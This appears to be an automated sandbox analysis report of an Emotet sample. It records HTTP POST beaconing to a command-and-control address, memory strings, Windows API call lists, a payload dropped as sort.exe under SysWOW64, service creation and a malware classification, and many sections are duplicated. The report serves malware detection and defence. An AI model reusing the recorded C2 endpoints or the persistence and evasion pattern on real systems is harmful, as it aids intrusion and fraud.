Source: unknown	HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache
Source: unknown	HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache

Source: sort.exe, 00000001.00000002.932263156.0000000002AA3000.00000004.00000001.sdmp	String found in binary or memory: http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758139074.0000027873F62000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: sort.exe, 00000001.00000002.932252355.0000000002A7F000.00000004.00000001.sdmp	String found in binary or memory: https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: sort.exe, 00000001.00000002.932263156.0000000002AA3000.00000004.00000001.sdmp	String found in binary or memory: http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758139074.0000027873F62000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: sort.exe, 00000001.00000002.932252355.0000000002A7F000.00000004.00000001.sdmp	String found in binary or memory: https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443

Source: 2ojdmC51As.exe, 00000000.00000002.667805094.000000000069A000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: 2ojdmC51As.exe, 00000000.00000002.667805094.000000000069A000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,	0_2_00422473
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	0_2_00422488
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	0_2_0041580E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004238DC GetKeyState,GetKeyState,GetKeyState,	0_2_004238DC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,	0_2_0041E95F
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState,	0_2_00412ABD
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	0_2_00410E05
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,	0_2_00422473
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	0_2_00422488
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	0_2_0041580E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004238DC GetKeyState,GetKeyState,GetKeyState,	0_2_004238DC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,	0_2_0041E95F
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState,	0_2_00412ABD
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	0_2_00410E05
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00422473 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,	1_2_00422473
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00422488 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,	1_2_00422488
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0041580E GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	1_2_0041580E
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_004238DC GetKeyState,GetKeyState,GetKeyState,	1_2_004238DC
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0041E95F ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,	1_2_0041E95F
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00412ABD GetKeyState,GetKeyState,GetKeyState,GetKeyState,	1_2_00412ABD
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00410E05 __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,SendMessageA,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,	1_2_00410E05

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2ojdmC51As.exe.2230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.sort.exe.2270000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,		1_2_02272650
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,		1_2_02272650

Source: C:\Users\user\Desktop\2ojdmC51As.exe	File created: C:\Windows\SysWOW64\setupugc\			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	File created: C:\Windows\SysWOW64\setupugc\			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	File deleted: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	File deleted: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00408293	0_2_00408293
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004145CA	0_2_004145CA
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02238240	0_2_02238240
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02237740	0_2_02237740
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02236530	0_2_02236530
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02233BA0	0_2_02233BA0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02233F20	0_2_02233F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02231C70	0_2_02231C70
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02233D10	0_2_02233D10
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00408293	0_2_00408293
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004145CA	0_2_004145CA
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02238240	0_2_02238240
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02237740	0_2_02237740
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02236530	0_2_02236530
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02233BA0	0_2_02233BA0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02233F20	0_2_02233F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02231C70	0_2_02231C70
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02233D10	0_2_02233D10
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00408293	1_2_00408293
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_004145CA	1_2_004145CA
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02278240	1_2_02278240
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02277740	1_2_02277740
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02276530	1_2_02276530
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02273BA0	1_2_02273BA0
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02273F20	1_2_02273F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02271C70	1_2_02271C70
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02273D10	1_2_02273D10
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02225ABE	1_2_02225ABE
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0223F2F9	1_2_0223F2F9
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_022292DE	1_2_022292DE
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0222380E	1_2_0222380E
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_022258AE	1_2_022258AE
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_022280CE	1_2_022280CE
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0222573E	1_2_0222573E
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02229DDE	1_2_02229DDE

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: String function: 00406520 appears 174 times
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: String function: 00405626 appears 49 times
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: String function: 00406520 appears 174 times
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: String function: 00405626 appears 49 times
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: String function: 00406520 appears 168 times
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: String function: 00405626 appears 44 times

Source: 2ojdmC51As.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2ojdmC51As.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2ojdmC51As.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2ojdmC51As.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 2ojdmC51As.exe, 00000000.00000000.665451688.000000000043C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668161072.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe	Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000000.665451688.000000000043C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668209951.0000000002640000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe, 00000000.00000002.668161072.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs 2ojdmC51As.exe
Source: 2ojdmC51As.exe	Binary or memory string: OriginalFilenameEffectDemo.EXEN vs 2ojdmC51As.exe

Source: classification engine

Classification label: mal80.troj.evad.winEXE@6/0@0/2

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00418C88 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,		0_2_00418C88
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00418C88 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,		0_2_00418C88

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,		0_2_022387D0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle,		0_2_022387D0

Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02274CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,		1_2_02274CB0
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02274CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification,		1_2_02274CB0

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00412121 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,		0_2_00412121
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00412121 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,		0_2_00412121

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,		0_2_02235070
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,		0_2_02235070

Source: 2ojdmC51As.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 2ojdmC51As.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2ojdmC51As.exe	File read: C:\Users\desktop.ini			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	File read: C:\Users\desktop.ini			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers			Jump to behavior

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2ojdmC51As.exe 'C:\Users\user\Desktop\2ojdmC51As.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe	Jump to behavior
Source: unknown	Process created: C:\Users\user\Desktop\2ojdmC51As.exe 'C:\Users\user\Desktop\2ojdmC51As.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process created: C:\Windows\SysWOW64\setupugc\sort.exe C:\Windows\SysWOW64\setupugc\sort.exe	Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,		0_2_004013A4
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,		0_2_004013A4

Source: 2ojdmC51As.exe	Static PE information: real checksum: 0x69574 should be: 0x6a2b7
Source: 2ojdmC51As.exe	Static PE information: real checksum: 0x69574 should be: 0x6a2b7

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406520 push eax; ret	0_2_0040653E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406830 push eax; ret	0_2_0040685E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235E10 push ecx; mov dword ptr [esp], 0000F5B3h	0_2_02235E11
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235EA0 push ecx; mov dword ptr [esp], 0000A3FDh	0_2_02235EA1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235EF0 push ecx; mov dword ptr [esp], 0000669Ch	0_2_02235EF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235F20 push ecx; mov dword ptr [esp], 0000E36Ch	0_2_02235F21
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235CD0 push ecx; mov dword ptr [esp], 00001CE1h	0_2_02235CD1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235D20 push ecx; mov dword ptr [esp], 0000C5A1h	0_2_02235D21
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235D00 push ecx; mov dword ptr [esp], 00001F9Eh	0_2_02235D01
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235D50 push ecx; mov dword ptr [esp], 00006847h	0_2_02235D51
